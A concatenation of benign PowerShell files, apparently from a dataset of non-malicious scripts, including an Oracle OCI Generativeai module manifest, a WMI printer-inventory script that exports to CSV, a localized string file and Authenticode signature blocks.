dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz # QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnSOXkwIhgPMjAyNDA0MjMyMTQzMjFaGA8yMDI0MDQyNDIxNDMyMVowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6dI5eQIBADAHAgEAAgIZ+zAHAgEAAgISnDAKAgUA # 6dOK+QIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAJGKR1qJKl/+mW5U2h2l # 4liBeGpbziNYtKnpBCMp30HYhdVKFaph0TxsBGaJLYLrQ2S7wBX5JVFvTKnTyYze # pJcgAC9YkIJt78a/e5HdsTiqydcnvbuRwlJYowGhvrnT/TnMW2q5bQi5U7jdx4Q9 # DCXm0Ao6uid4NKGA32H0Rji2MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgp+zDE8w5BkLNiIOUg8zQQbwXYWEDEEHJ3CdoAGSb/FUwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69 # 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q # wPM9tAujAAEAAAHlMCIEILE/ZDCz6TZPcDPgj4ZgWNKXRgchnitzlVyga3nqoA2P # MA0GCSqGSIb3DQEBCwUABIICAA1YiBDKyyUcONypmkDFR9kkqouYNFNlp9qeLUXM # O5cMzyo+/75XAA5EHmebaudbuLojtImP93dcdrgSdZjV0Xaj8OrL+mIcDCN4+LqI # v8S3bhXmpFQeWPZsnZAOXtQ7gycHz/Psy3X3e2JKTg5/apxtQ8T7P2jYrZmpJoxa # dP7Tsk3vG2tCdvjPKp8+n+CtMvZ4a2RSjXu86Thsrko093FNpR0sy/nTYCufc42G # WoTfcqjamPk0d9befVsOeFFQeAqsWPFOdIzl+6B67xHZoY4zwrV8Q2epeIOViM80 # 61jbucGls9Q6B/qoVVy4X96atA8PSKdTpPr7bngJbjPhGhCga/68K6wNCEpPDnDB # DlDYSdGy1GElO3VEIr1xoqOxx/EWviQSxkICnZRgJYos4mRgLRDsvB0T95jAmX/G # Xju/c/m6hzF11HBRw00673ZokYvmOdBjGbEiXMHofypLQTGVwPILj+l6uAA5fVvx # PJe/jGxy8D0u0NmnmYmUDB7DEfgFjWDiOb2rktguypGKd49Q96gCq4IlbcyhscGp # pQaW0AMebi7RCv1J9UkOkw6NuYFfbMAog/HZPRGjcFbJ7ZHnPI0esm63eahQqOIi # bUX+O1cb1bYRSHujTUGccOQBE+IUNCBiS8GRvoH1nQKOoeQOJh11VmNUXx8H8fTm # 6Xj/ # SIG # End signature block
combined_dataset/train/non-malicious/sample_59_16.ps1
sample_59_16.ps1
# # Module manifest for module 'OCI.PSModules.Generativeai' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Generativeai.dll' # Version number of this module. ModuleVersion = '87.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '88627585-5bbc-41e3-a1a5-15e5194ce97a' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Generativeai Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '87.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Generativeai.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIGenerativeaiDedicatedAiCluster', 'Get-OCIGenerativeaiDedicatedAiClustersList', 'Get-OCIGenerativeaiEndpoint', 'Get-OCIGenerativeaiEndpointsList', 'Get-OCIGenerativeaiModel', 'Get-OCIGenerativeaiModelsList', 'Get-OCIGenerativeaiWorkRequest', 'Get-OCIGenerativeaiWorkRequestErrorsList', 'Get-OCIGenerativeaiWorkRequestLogsList', 'Get-OCIGenerativeaiWorkRequestsList', 'Move-OCIGenerativeaiDedicatedAiClusterCompartment', 'Move-OCIGenerativeaiEndpointCompartment', 'Move-OCIGenerativeaiModelCompartment', 'New-OCIGenerativeaiDedicatedAiCluster', 'New-OCIGenerativeaiEndpoint', 'New-OCIGenerativeaiModel', 'Remove-OCIGenerativeaiDedicatedAiCluster', 'Remove-OCIGenerativeaiEndpoint', 'Remove-OCIGenerativeaiModel', 'Update-OCIGenerativeaiDedicatedAiCluster', 'Update-OCIGenerativeaiEndpoint', 'Update-OCIGenerativeaiModel' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Generativeai' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Get-PrinterInfo_1.ps1
Get-PrinterInfo_1.ps1
$strComputer = "PrinterName" $Ports = get-wmiobject -class "win32_tcpipprinterport" -namespace "root\\CIMV2" -computername $strComputer $Printers = get-wmiobject -class "Win32_Printer" -namespace "root\\CIMV2" -computername $strComputer $ports | Select-Object Name,Hostaddress | Set-Variable port $Printers | Select-Object Name,PortName,DriverName,location,Description | Set-Variable print $num = 0 $hash = @{} do { $hash.Add($port.name[$num], $port.hostaddress[$num]) $num = $num + 1 } until ($num -eq $ports.Count) # Creates Table $table = New-Object system.Data.DataTable “$PrinterInfo” $colName = New-Object system.Data.DataColumn PrinterName,([string]) $colIP = New-Object system.Data.DataColumn IP,([string]) $colDrive = New-Object system.Data.DataColumn DriverName,([string]) $colLoc = New-Object system.Data.DataColumn location,([string]) $colDesc = New-Object system.Data.DataColumn Description,([string]) $table.columns.add($colName) $table.columns.add($colIP) $table.columns.add($colDrive) $table.columns.add($colLoc) $table.columns.add($colDesc) $num = 0 Do { $row = $table.NewRow() $row.PrinterName = $printers.name[$num] $row.IP = $hash.get_item($printers.PortName[$num]) $row.DriverName = $printers.drivername[$num] $row.Location = $printers.Location[$num] $row.Description = $printers.Description[$num] $table.Rows.Add($row) $num = $num + 1 } until ($num -eq $printers.Count) $table | Select-Object PrinterName,IP,DriverName,Location,Description | Export-Csv C:\\Printers.csv
combined_dataset/train/non-malicious/sample_10_70.ps1
sample_10_70.ps1
ConvertFrom-StringData @' id_clusterdependencyreport=Cluster resource dependency report id_clusterdependencyreportdesc1=Obtaining cluster resource dependency report id_clusterdependencyreportdesc=Obtaining cluster resource dependency report from group %GroupName% '@ # SIG # Begin signature block # MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDX84ypwX9CpeTj # WGHsbvyfRHJaPuGRmPzpN7q0QNbGcaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAds # XCkKMReSMdnLnz4zFgSH6Xh7weNTAwVBhOoRXsgOMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAeSEuBOaIeus7iX8tkXVA49A/yixwbMgy3ASI # ghwed52tYKTPniZBRlGEMmYzQvyqoSJApiJkvXuVz+L8Kq3zGa7NwiWOGzmgjz0b # JYgmXmgENv3stI7FWhKFBO/CjPVGylbHZJVJb/hH9ANN3Vb7TsO71P2wXVkRdAaf # wZ3fv6uB4ksrpNIne5r5LtCIbpBna6RL4zN3MPS+HFQ9i3PgM1KkdyQjXzY1mTRu # G29TgzI/+2u9Apuh/vfEantvRAyuu3KZhx21lb4pnKbFG+LEQqNaiVjNNxibal1p # Y/4lEyNPyjYbhsMV3Dqo88VST1CeZlz3Hk7LpkPxVw91OctDrKGCF60wghepBgor # BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDTrSGYZXBhbsknL+mD1DnwB3eEmJEZVyVN # RhI+M1gJ0wIGZusiCs6bGBMyMDI0MTAyODExNDA0MC44NDRaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB91gg # dQTK+8L0AAEAAAH3MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEwNloXDTI1MTAyMjE4MzEwNlowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjM2MDUtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # 0OdHTBNom6/uXKaEKP9rPITkT6QxF11tjzB0Nk1byDpPrFTHha3hxwSdTcr8Y0a3 # k6EQlwqy6ROz42e0R5eDW+dCoQapipDIFUOYp3oNuqwX/xepATEkY17MyXFx6rQW # 2NcWUJW3Qo2AuJ0HOtblSpItQZPGmHnGqkt/DB45Fwxk6VoSvxNcQKhKETkuzrt8 # U6DRccQm1FdhmPKgDzgcfDPM5o+GnzbiMu6y069A4EHmLMmkecSkVvBmcZ8VnzFH # TDkGLdpnDV5FXjVObAgbSM0cnqYSGfRp7VGHBRqyoscvR4bcQ+CV9pDjbJ6S5rZn # 1uA8hRhj09Hs33HRevt4oWAVYGItgEsG+BrCYbpgWMDEIVnAgPZEiPAaI8wBGemE # 4feEkuz7TAwgkRBcUzLgQ4uvPqRD1A+Jkt26+pDqWYSn0MA8j0zacQk9q/AvciPX # D9It2ez+mqEzgFRRsJGLtcf9HksvK8Jsd6I5zFShlqi5bpzf1Y4NOiNOh5QwW1pI # vA5irlal7qFhkAeeeZqmop8+uNxZXxFCQG3R3s5pXW89FiCh9rmXrVqOCwgcXFIJ # 